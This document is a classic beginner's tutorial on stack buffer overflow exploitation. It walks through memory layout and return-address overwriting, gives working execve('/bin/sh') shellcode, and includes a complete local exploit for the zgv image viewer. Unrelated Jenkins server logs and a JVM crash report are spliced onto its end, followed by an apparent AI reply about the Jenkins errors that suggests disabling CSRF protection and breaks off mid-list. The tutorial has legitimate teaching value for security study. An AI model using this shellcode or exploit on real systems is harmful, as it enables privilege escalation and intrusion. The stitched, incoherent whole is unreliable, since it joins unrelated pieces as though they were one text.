Writing Buffer Overflow Exploits - a Tutorial for Beginners 10 Apr. 2002

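This document describes in detail how to find and exploit buffer overflow vulnerabilities, including memory layout, the function call process, and how to craft malicious input that changes a program's execution flow.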
 
 Summary
Buffer overflows in user input dependent buffers have become one of the biggest security hazards on the internet and to modern computing in general. This is because such an error can easily be made at the programming level, and while it is invisible to the user who does not understand or cannot acquire the source code, many of those errors are easy to exploit. This paper attempts to teach the novice to average C programmer how an overflow condition can be proven to be exploitable.
 
Credit:
The information has been provided by Mixter.
 
 Details
1. Memory
Note: Memory for a process is organized the way we describe it here on most computers; however, the details depend on the type of processor architecture. This example is for x86 and roughly applies to Sparc.

The principle of exploiting a buffer overflow is to overwrite parts of memory that are not supposed to be overwritten with arbitrary input, and to make the process execute that input as code. To see how and where an overflow takes place, let us look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which it can then access without having to know where the memory is physically located in RAM. The process's memory consists of three sections:

 - Code segment: the data in this segment are assembler instructions that the processor executes. Code execution is non-linear; it can skip code, jump, and call functions on certain conditions. Therefore, we have a pointer called EIP, or instruction pointer. The address that EIP points to always contains the code that will be executed next.

 - Data segment, space for variables and dynamic buffers

 - Stack segment, which is used to pass data (arguments) to functions and as space for the local variables of functions. The bottom (start) of the stack usually resides at the very end of the virtual memory of a page, and the stack grows down. The assembler command PUSHL adds an item to the top of the stack, and POPL removes one item from the top of the stack and puts it in a register. For accessing the stack memory directly, there is the stack pointer ESP, which points at the top (lowest memory address) of the stack.


2. Functions
A function is a piece of code in the code segment that is called, performs a task, and then returns to the previous thread of execution. Optionally, arguments can be passed to a function. In assembler, it usually looks like this (very simple example, just to get the idea):

memory address      code
0x8054321 <main+x>    pushl $0x0
0x8054322    call $0x80543a0 <function>
0x8054327    ret
0x8054328    leave
...
0x80543a0 <function>  popl %eax
0x80543a1    addl $0x1337,%eax
0x80543a4    ret

What happens here? The main function calls function(0). The argument is 0; main pushes it onto the stack and calls the function. The function gets the argument from the stack using popl. (This is simplified: at function entry the return address lies on top of the stack, so real compiled code reads its arguments at an offset from ESP or EBP instead of popping them.) After finishing, the function returns to 0x8054327. Commonly, the called function first pushes the caller's EBP register onto the stack and restores it before returning. This is the frame pointer concept, which allows the function to use its own offsets for addressing. It is mostly uninteresting while dealing with exploits, because the function will not return to the original execution thread anyway. We just have to know what the stack looks like. At the top, we have the internal buffers and variables of the function. After this, there is the saved EBP register (32 bit, which is 4 bytes), and then the return address, which is again 4 bytes. Going further down, there are the arguments passed to the function, which are uninteresting to us.

In this case, our return address is 0x8054327. It is automatically stored on the stack when the function is called. This return address can be overwritten, and changed to point to any point in memory, if there is an overflow somewhere in the code.

3. Example of an exploitable program
Let us assume that we exploit a function like this:

void lame (void) { char small[30]; gets (small); printf("%s\n", small); }
main() { lame (); return 0; }

Compile and disassemble it:
# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function `lame':
/root/blah.c:1: the `gets' function is dangerous and should not be used.
# gdb blah
/* short explanation: gdb, the GNU debugger is used here to read the
   binary file and disassemble it (translate bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 <main>:       pushl  %ebp
0x80484c9 <main+1>:     movl   %esp,%ebp
0x80484cb <main+3>:     call   0x80484a0 <lame>
0x80484d0 <main+8>:     leave
0x80484d1 <main+9>:     ret

(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack right before the ret address */
0x80484a0 <lame>:       pushl  %ebp
0x80484a1 <lame+1>:     movl   %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the
   memory is allocated 4byte-wise (because the processor uses 32bit words)
   this is the equivalent to: char small[30]; */
0x80484a3 <lame+3>:     subl   $0x20,%esp
/* load a pointer to small[30] (the space on the stack, which is located
   at virtual address 0xffffffe0(%ebp)) on the stack, and call
   the gets function: gets(small); */
0x80484a6 <lame+6>:     leal   0xffffffe0(%ebp),%eax
0x80484a9 <lame+9>:     pushl  %eax
0x80484aa <lame+10>:    call   0x80483ec <gets>
0x80484af <lame+15>:    addl   $0x4,%esp
/* load the address of small and the address of "%s\n" string on stack
   and call the print function: printf("%s\n", small); */
0x80484b2 <lame+18>:    leal   0xffffffe0(%ebp),%eax
0x80484b5 <lame+21>:    pushl  %eax
0x80484b6 <lame+22>:    pushl  $0x804852c
0x80484bb <lame+27>:    call   0x80483dc <printf>
0x80484c0 <lame+32>:    addl   $0x8,%esp
/* get the return address, 0x80484d0, from stack and return to that address.
   you don't see that explicitly here because it is done by the CPU as 'ret' */
0x80484c3 <lame+35>:    leave
0x80484c4 <lame+36>:    ret

End of assembler dump.

3a. Overflowing the program
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb blah core
(gdb) info registers
     eax:       0x24          36
     ecx:  0x804852f   134513967
     edx:        0x1           1
     ebx:   0x11a3c8     1156040
     esp: 0xbffffdb8 -1073742408
     ebp:   0x787878     7895160
              ^^^^^^
EBP is 0x787878, which means that we have written more data onto the stack than the input buffer could hold; 0x78 is the hex representation of 'x'. The process had a buffer of 32 bytes. The 35 input characters plus the terminating zero byte filled it and spilled 4 bytes into the saved EBP, which therefore reads 0x00787878. The segmentation fault most likely occurred when main executed leave with this bogus frame pointer. A few more input characters would also overwrite the return address with 'xxxx', and the process would then try to resume execution at address 0x78787878.

3b. Changing the return address
Let us try to exploit the program so that it returns into a second call of lame() instead of returning normally. We have to change the return address from 0x80484d0 to 0x80484cb. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET. Here is a simple program that writes the 4-byte return address repeatedly into a character buffer:
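#include <stdio.h>
int main()
{
int i=0; char buf[48];
/* long is 4 bytes on 32-bit x86; 11 copies cover buffer, saved EBP and RET */
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
buf[44] = 0;   /* terminate the string for puts() */
puts(buf);
return 0;
}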
# ret
???????????,

# (ret;cat)|./blah
test     <- user input
???????????,test
test     <- user input
test

Here we are, the program went through the function two times. If an overflow is present, the return address of functions can be changed to alter the program's execution thread.


4. Shellcode
To keep it simple, shellcode is just a sequence of assembler instructions that we write onto the stack; we then change the return address so that the function returns onto the stack. Using this method, we can insert code into a vulnerable process and then execute it right on the stack.
So, let us generate insertable assembler code to run a shell. A common system call is execve(), which loads and runs any binary, terminating execution of the current process. The manpage gives us the usage:
int execve (const char *filename, char *const argv [], char *const envp[]);
Let us get the details of the system call from glibc2:
# gdb /lib/libc.so.6
(gdb) disas execve
Dump of assembler code for function execve:
0x5da00 <execve>:       pushl  %ebx

/* this is the actual syscall. before a program would call execve, it would
  push the arguments in reverse order on the stack: **envp, **argv, *filename */
/* put address of **envp into edx register */
0x5da01 <execve+1>:     movl   0x10(%esp,1),%edx
/* put address of **argv into ecx register */
0x5da05 <execve+5>:     movl   0xc(%esp,1),%ecx
/* put address of *filename into ebx register */
0x5da09 <execve+9>:     movl   0x8(%esp,1),%ebx
/* put 0xb in eax register; 0xb == execve in the internal system call table */
0x5da0d <execve+13>:    movl   $0xb,%eax
/* give control to kernel, to execute execve instruction */
0x5da12 <execve+18>:    int    $0x80

0x5da14 <execve+20>:    popl   %ebx
0x5da15 <execve+21>:    cmpl   $0xfffff001,%eax
0x5da1a <execve+26>:    jae    0x5da1d <__syscall_error>
0x5da1c <execve+28>:    ret
End of assembler dump.

4a. Making the code portable
We have to apply a trick to write shellcode that does not reference its arguments the conventional way, by their exact address on the memory page, since that can only be done at compile time.
Once we can estimate the size of the shellcode, we can use the instructions jmp <bytes> and call to go a specified number of bytes back or forth in the execution thread. Why use a call? A CALL automatically stores the return address on the stack, the return address being the address of whatever immediately follows the CALL instruction. By placing a variable right behind the call, we indirectly push its address on the stack without having to know it.

0   jmp <Z>     (skip Z bytes forward)
2   popl %esi
... put function(s) here ...
Z   call <-Z+2> (skip 2 less than Z bytes backward, to POPL)
Z+5 .string     (first variable)

(Note: If you are going to write code more complex than for spawning a simple shell, you can put more than one .string behind the code. You know the size of those strings and can therefore calculate their relative locations once you know where the first string is located.)

4b. The shellcode
.globl code_start    /* we'll need this later, do not mind it */
.globl code_end
  .data
code_start:
  jmp  0x17
  popl %esi
  movl %esi,0x8(%esi)  /* put address of **argv behind shellcode,
           0x8 bytes behind it so a /bin/sh has place */
  xorl %eax,%eax    /* put 0 in %eax */
  movb %al,0x7(%esi)  /* put terminating 0 after /bin/sh string */
  movl %eax,0xc(%esi)  /* another 0 to get the size of a long word */
my_execve:
  movb $0xb,%al    /* execve(         */
  movl %esi,%ebx    /* "/bin/sh",      */
  leal 0x8(%esi),%ecx  /* & of "/bin/sh", */
  xorl %edx,%edx    /* NULL       */
  int $0x80    /* );       */
  call -0x1c
  .string "/bin/shX"  /* X is overwritten by the movb to 0x7(%esi) */
code_end:

(The relative offsets 0x17 and -0x1c can be obtained by putting in 0x0, compiling, disassembling, and then looking at the shellcode's size.)

This is already working shellcode, though minimal. You should at least disassemble the exit() syscall and attach it (before the 'call'). The real art of making shellcode also consists of avoiding any binary zeroes in the code (a zero byte very often marks the end of input or of a buffer), and of modifying it so that, for example, the binary code does not contain control characters or lowercase characters, which would get filtered out by some vulnerable programs.
Most of this is done with self-modifying code, as in the movb instruction above that writes to 0x7(%esi). We replaced the X with \0, but without having a \0 in the shellcode initially...

Let us test this code... save the above code as code.S (remove comments) and the following file as code.c:
extern void code_start();
extern void code_end();
#include <stdio.h>
main() { ((void (*)(void)) code_start)(); }

# cc -o code code.S code.c
# ./code
bash#

You can now convert the shellcode to a hex char buffer.
The best way to do this is to print it out:
#include <stdio.h>
extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }

and pipe it through aconv -h or bin2c.pl; those tools can be found at:
http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity.

5. Writing an exploit
Let us look at how to change the return address to point to shellcode put on the stack, and write a sample exploit. We will take zgv, because that is one of the easiest things to exploit out there.

# export HOME=`perl -e 'printf "a" x 2000'`
# zgv
Segmentation fault (core dumped)
# gdb /usr/bin/zgv core
#0 0x61616161 in ?? ()
(gdb) info register esp
     esp: 0xbffff574 -1073744524

Well, this is the top of the stack at crash time. It is safe to presume that we can use this as return address to our shellcode. We will now add some NOP (no operation) instructions before our buffer, so we do not have to be 100% correct regarding the prediction of the exact start of our shellcode in memory (or even brute forcing it).
The function will return onto the stack somewhere before our shellcode, work its way through the NOPs to the initial JMP command, jump to the CALL, jump back to the popl, and run our code on the stack.

Remember, the stack looks like this: at the lowest memory address, the top of the stack where ESP points to, the initial variables are stored, namely the buffer in zgv that stores the HOME environment variable.

After that, we have the saved EBP(4bytes) and the return address of the previous function. We must write 8 bytes or more behind the buffer to overwrite the return address with our new address on the stack.

The buffer in zgv is 1024 bytes big. You can find that out by glancing at the code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable function. We will now put all those parts together in the exploit:

5a. Sample zgv exploit
/*                   zgv v3.0 exploit by Mixter
          buffer overflow tutorial - http://1337.tsx.org

        sample exploit, works for example with precompiled
    redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP     0x90
#define LEN     1032
#define RET     0xbffff574

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* this fills the whole buffer with the return address, see 3b) */
for (i=0;i<LEN;i+=4)
   *(long *)&buffer[i] = retaddr;

/* this fills the initial buffer with NOP's, 100 chars less than the
   buffer size, so the shellcode and return address fits in comfortably */
for (i=0;i<(LEN-strlen(shellcode)-100);i++)
   *(buffer+i) = NOP;

/* after the end of the NOPs, we copy in the execve() shellcode */
memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run zgv */

setenv("HOME", buffer, 1);
execlp("zgv","zgv",NULL);
return 0;
}

/* EOF */

We now have a string looking like this:

[ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]

While zgv's stack looks like this:

v-- 0xbffff574 is here
[ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]

The execution thread of zgv is now as follows:

main ... -> function() -> strcpy(smallbuffer,getenv("HOME"));
At this point, zgv fails to do bounds checking, writes beyond the small buffer, and the return address to main is overwritten with our new address on the stack. function() does leave/ret and the EIP points onto the stack:
0xbffff574 nop
0xbffff575 nop
0xbffff576 nop
0xbffff577 jmp 0x17                     1
0xbffff579 popl %esi          3 <--\    |
[... shellcode starts here ...]    |    |
0xbffff590 call -0x1c              2 <--/
0xbffff595 .string "/bin/shX"

Let us test the exploit...
# cc -o zgx zgx.c
# ./zgx
using address 0xbffff574
bash#

5b. Further tips on writing exploits
There are many programs that are tough to exploit, but nonetheless vulnerable. However, there are many tricks you can use to get past filtering and the like. There are also other overflow techniques that do not necessarily involve changing the return address at all, or not only the return address. There are so-called pointer overflows, where a pointer that a function allocates can be overwritten by an overflow, altering the program's execution flow (an example is the RoTShB bind 4.9 exploit), and exploits where the return address points to the shell's environment pointer, where the shellcode is located instead of being on the stack (this defeats very small buffers and non-executable stack patches, and can fool some security programs, though it can only be performed locally).
Another important subject for the skilled shellcode author is radically self-modifying code, which initially consists only of printable, non-whitespace, uppercase characters, and then modifies itself to put functional shellcode on the stack, which it executes, etc. You should never, ever have any binary zeroes in your shellcode, because it will most likely not work if it contains any. However, discussing how to substitute certain assembler commands with others would go beyond the scope of this paper. We also suggest reading the other great overflow howtos out there, written by aleph1, Taeho Oh and mudge.

6. Conclusions
We have learned that once an overflow is present which is user dependent, it can be exploited about 90% of the time, even though exploiting some situations is difficult and takes some skill. Why is it important to write exploits? Because ignorance is omnipresent in the software industry. There have already been reports of vulnerabilities due to buffer overflows in software where the software was not updated, or the majority of users did not update, because the vulnerability was hard to exploit and nobody believed it created a security risk. Then an exploit actually comes out and proves that the program is exploitable in practice, and there is usually a big (necessary) hurry to update it.

As for the programmer (you), it is a hard task to write secure programs, but it should be taken very seriously. This is an especially large concern when writing servers, any type of security programs, or programs that are suid root, or designed to be run by root, any special accounts, or the system itself. The main principles we suggest are: apply bounds checking (strn*, sn* functions instead of sprintf etc.), prefer allocating buffers of a dynamic, input-dependent size, be careful with for/while/etc. loops that gather data and stuff it into a buffer, and generally handle user input with great care.

The security industry has also made a notable effort to prevent overflow problems with techniques like non-executable stacks, suid wrappers, guard programs that check return addresses, bounds checking compilers, and so on. You should make use of those techniques where possible, but do not fully rely on them. Do not assume you are safe at all if you run a vanilla two-year-old UNIX distribution without updates but with overflow protection or (even more stupid) firewalling/IDS. These cannot assure security if you continue to use insecure programs, because _all_ security programs are _software_ and can contain vulnerabilities themselves, or at least not be perfect. If you apply frequent updates _and_ security measures, you still cannot expect to be secure, _but_ you can hope.
2025-09-12 03:59:46.390+0000 [id=63] INFO jenkins.InitReactorRunner$1#onAttained: System config adapted 2025-09-12 03:59:46.403+0000 [id=47] INFO jenkins.InitReactorRunner$1#onAttained: Loaded all jobs 2025-09-12 03:59:46.411+0000 [id=76] INFO jenkins.InitReactorRunner$1#onAttained: Configuration for all jobs updated 2025-09-12 03:59:46.427+0000 [id=53] INFO jenkins.InitReactorRunner$1#onAttained: Completed initialization 2025-09-12 03:59:46.473+0000 [id=36] INFO hudson.lifecycle.Lifecycle#onReady: Jenkins is fully up and running 2025-09-12 06:23:41.833+0000 [id=882] WARNING hudson.security.csrf.CrumbFilter#doFilter: Found invalid crumb 147b3c82bca9ebd1fa602daaf99e15931ab6f23e4863689a02a1634c924c7fef. If you are calling this URL with a script, please use the API Token instead. More information: https://www.jenkins.io/redirect/crumb-cannot-be-used-for-script 2025-09-12 06:23:41.834+0000 [id=882] WARNING hudson.security.csrf.CrumbFilter#doFilter: No valid crumb was included in request for /view/%E5%87%AF%E5%88%A9/job/%E6%8C%87%E6%8C%A5%E5%A4%A7%E5%B1%8Fapi-pipeline/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile by admin. Returning 403. 
2025-09-12 09:21:05.113+0000 [id=2548] WARNING j.p.p.BapSshClient#waitForExec: null java.lang.InterruptedException at java.base/java.lang.Object.wait(Native Method) at java.base/java.lang.Thread.join(Unknown Source) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.waitForExec(BapSshClient.java:567) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.exec(BapSshClient.java:481) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:242) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:51) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.endTransfers(BapPublisher.java:283) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.perform(BapPublisher.java:233) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.access$000(BapPublisher.java:205) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher.perform(BapPublisher.java:158) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:65) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:38) at hudson.FilePath.act(FilePath.java:1210) at hudson.FilePath.act(FilePath.java:1193) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPInstanceConfig.perform(BPInstanceConfig.java:141) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPPlugin.perform(BPPlugin.java:126) at jenkins.tasks.SimpleBuildStep.perform(SimpleBuildStep.java:123) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:101) at PluginClassLoader for 
workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:71) at PluginClassLoader for workflow-step-api//org.jenkinsci.plugins.workflow.steps.SynchronousNonBlockingStepExecution.lambda$start$0(SynchronousNonBlockingStepExecution.java:49) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source) at java.base/java.util.concurrent.FutureTask.run(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.base/java.lang.Thread.run(Unknown Source) 2025-09-12 09:21:05.113+0000 [id=2640] WARNING j.p.p.BapSshClient$ExecCheckThread#run: sleep interrupted java.lang.InterruptedException: sleep interrupted at java.base/java.lang.Thread.sleep(Native Method) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient$ExecCheckThread.run(BapSshClient.java:592) 2025-09-12 09:21:05.114+0000 [id=2548] WARNING j.p.p.BPCallablePublisher#invoke: Exception when publishing, exception message [Exec timed out or was interrupted after 64,625 ms] jenkins.plugins.publish_over.BapPublisherException: Exec timed out or was interrupted after 64,625 ms at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.waitForExec(BapSshClient.java:577) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.exec(BapSshClient.java:481) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:242) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:51) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.endTransfers(BapPublisher.java:283) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.perform(BapPublisher.java:233) at 
PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.access$000(BapPublisher.java:205) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher.perform(BapPublisher.java:158) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:65) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:38) at hudson.FilePath.act(FilePath.java:1210) at hudson.FilePath.act(FilePath.java:1193) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPInstanceConfig.perform(BPInstanceConfig.java:141) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPPlugin.perform(BPPlugin.java:126) at jenkins.tasks.SimpleBuildStep.perform(SimpleBuildStep.java:123) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:101) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:71) at PluginClassLoader for workflow-step-api//org.jenkinsci.plugins.workflow.steps.SynchronousNonBlockingStepExecution.lambda$start$0(SynchronousNonBlockingStepExecution.java:49) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source) at java.base/java.util.concurrent.FutureTask.run(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source) at java.base/java.lang.Thread.run(Unknown Source) 2025-09-12 09:21:05.115+0000 [id=2548] WARNING j.p.p.BPInstanceConfig#perform: An exception was caught when invoking perform jenkins.plugins.publish_over.BapPublisherException: Exec timed out or was interrupted after 64,625 ms at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.waitForExec(BapSshClient.java:577) at 
PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.exec(BapSshClient.java:481) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:242) at PluginClassLoader for publish-over-ssh//jenkins.plugins.publish_over_ssh.BapSshClient.endTransfers(BapSshClient.java:51) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.endTransfers(BapPublisher.java:283) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.perform(BapPublisher.java:233) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher$Performer.access$000(BapPublisher.java:205) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BapPublisher.perform(BapPublisher.java:158) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:65) Caused: jenkins.plugins.publish_over.BapPublisherException: Exception when publishing, exception message [Exec timed out or was interrupted after 64,625 ms] at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:69) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPCallablePublisher.invoke(BPCallablePublisher.java:38) at hudson.FilePath.act(FilePath.java:1210) at hudson.FilePath.act(FilePath.java:1193) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPInstanceConfig.perform(BPInstanceConfig.java:141) at PluginClassLoader for publish-over//jenkins.plugins.publish_over.BPPlugin.perform(BPPlugin.java:126) at jenkins.tasks.SimpleBuildStep.perform(SimpleBuildStep.java:123) at PluginClassLoader for workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:101) at PluginClassLoader for 
workflow-basic-steps//org.jenkinsci.plugins.workflow.steps.CoreStep$Execution.run(CoreStep.java:71)
at PluginClassLoader for workflow-step-api//org.jenkinsci.plugins.workflow.steps.SynchronousNonBlockingStepExecution.lambda$start$0(SynchronousNonBlockingStepExecution.java:49)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Unknown Source)
at java.base/java.util.concurrent.FutureTask.run(Unknown Source)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.base/java.lang.Thread.run(Unknown Source)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007604e4b3ec9f, pid=7, tid=170
#
# JRE version: OpenJDK Runtime Environment Temurin-17.0.16+8 (17.0.16+8) (build 17.0.16+8)
# Java VM: OpenJDK 64-Bit Server VM Temurin-17.0.16+8 (17.0.16+8, mixed mode, tiered, compressed oops, compressed class ptrs, g1 gc, linux-amd64)
# Problematic frame:
# V [libjvm.so+0x83dc9f] java_lang_Throwable::fill_in_stack_trace(Handle, methodHandle const&, JavaThread*)+0x95f
#
# Core dump will be written. Default location: Core dumps may be processed with "/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E" (or dumping to //core.7)
#
# An error report file with more information is saved as:
# /tmp/hs_err_pid7.log
#
# If you would like to submit a bug report, please visit:
# https://github.com/adoptium/adoptium-support/issues
#
Running from: /usr/share/jenkins/jenkins.war
webroot: /var/jenkins_home/war
2025-09-12 09:22:52.973+0000 [id=1] INFO winstone.Logger#logInternal: Beginning extraction from war file
2025-09-12 09:22:53.005+0000 [id=1] WARNING o.e.j.ee9.nested.ContextHandler#setContextPath: Empty contextPath
2025-09-12 09:22:53.025+0000 [id=1] INFO org.eclipse.jetty.server.Server#doStart: jetty-12.0.22; built: 2025-06-02T15:25:31.946Z; git: 335c9ab44a5591f0ea941bf350e139b8c4f5537c; jvm 17.0.16+8
2025-09-12 09:22:53.151+0000 [id=1] INFO o.e.j.e.w.StandardDescriptorProcessor#visitServlet: NO JSP Support for /, did not find org.eclipse.jetty.ee9.jsp.JettyJspServlet
2025-09-12 09:22:53.168+0000 [id=1] INFO o.e.j.s.DefaultSessionIdManager#doStart: Session workerName=node0
2025-09-12 09:22:53.313+0000 [id=1] INFO hudson.WebAppMain#contextInitialized: Jenkins home directory: /var/jenkins_home found at: EnvVars.masterEnvVars.get("JENKINS_HOME")
2025-09-12 09:22:53.347+0000 [id=1] INFO o.e.j.s.handler.ContextHandler#doStart: Started oeje9n.ContextHandler$CoreContextHandler@1813f3e9{Jenkins v2.516.2,/,b=file:///var/jenkins_home/war/,a=AVAILABLE,h=oeje9n.ContextHandler$CoreContextHandler$CoreToNestedHandler@28cb9120{STARTED}}
2025-09-12 09:22:53.353+0000 [id=1] INFO o.e.j.server.AbstractConnector#doStart: Started ServerConnector@72458efc{HTTP/1.1, (http/1.1)}{0.0.0.0:8080}
2025-09-12 09:22:53.357+0000 [id=1] INFO org.eclipse.jetty.server.Server#doStart: Started oejs.Server@b9b00e0{STARTING}[12.0.22,sto=0] @603ms
2025-09-12 09:22:53.357+0000 [id=43] INFO winstone.Logger#logInternal: Winstone Servlet Engine running: controlPort=disabled
2025-09-12 09:22:53.400+0000 [id=36] INFO jenkins.model.Jenkins#<init>: Starting version 2.516.2
2025-09-12 09:22:53.430+0000 [id=50] INFO jenkins.InitReactorRunner$1#onAttained: Started initialization
2025-09-12 09:22:53.490+0000 [id=79] INFO jenkins.InitReactorRunner$1#onAttained: Listed all plugins
2025-09-12 09:22:54.524+0000 [id=108] INFO jenkins.InitReactorRunner$1#onAttained: Prepared all plugins
2025-09-12 09:22:54.531+0000 [id=65] INFO jenkins.InitReactorRunner$1#onAttained: Started all plugins
2025-09-12 09:22:54.532+0000 [id=65] INFO jenkins.InitReactorRunner$1#onAttained: Augmented all extensions
2025-09-12 09:22:54.725+0000 [id=27] INFO h.p.b.g.GlobalTimeOutConfiguration#load: global timeout not set
2025-09-12 09:22:55.091+0000 [id=94] INFO jenkins.InitReactorRunner$1#onAttained: System config loaded
2025-09-12 09:22:55.092+0000 [id=50] INFO jenkins.InitReactorRunner$1#onAttained: System config adapted
2025-09-12 09:22:55.114+0000 [id=95] INFO jenkins.InitReactorRunner$1#onAttained: Loaded all jobs
2025-09-12 09:22:55.115+0000 [id=69] INFO jenkins.InitReactorRunner$1#onAttained: Configuration for all jobs updated
2025-09-12 09:22:55.139+0000 [id=83] INFO jenkins.InitReactorRunner$1#onAttained: Completed initialization
2025-09-12 09:22:55.204+0000 [id=36] INFO hudson.lifecycle.Lifecycle#onReady: Jenkins is fully up and running
09-13
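<think>
We address the four problems the user raised (the invalid crumb warning, the InterruptedException, the execution timeout exception, and the fatal Java SIGSEGV error) and give a solution for each. Drawing on the references cited earlier, we also give concrete steps.

### 1. Resolving the invalid crumb warning (CSRF-related)

**Problem**: Jenkins API requests fail with `403 No valid crumb`, usually because of the CSRF protection mechanism.

**Solutions**:

1. **Temporarily disable CSRF protection (not recommended)**:
   Go to `Manage Jenkins` → `Configure Global Security` and uncheck `Enable proxy compatibility` and `Prevent Cross Site Request Forgery exploits`. This lowers security.
2. **Obtain the crumb correctly (recommended)**:
   Make sure each API request carries a valid crumb. A crumb can be obtained as follows:
   ```bash
   CRUMB=$(curl -u 'username:api_token' -s 'http://jenkins-url/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)')
   curl -u 'username:api_token' -H "$CRUMB" -X POST http://jenkins-url/job/your-job/build
   ```
   Note: on newer Jenkins versions (such as 2.479.2), make sure to use the correct crumb endpoint[^3].
3. **Use an API token instead of a password**:
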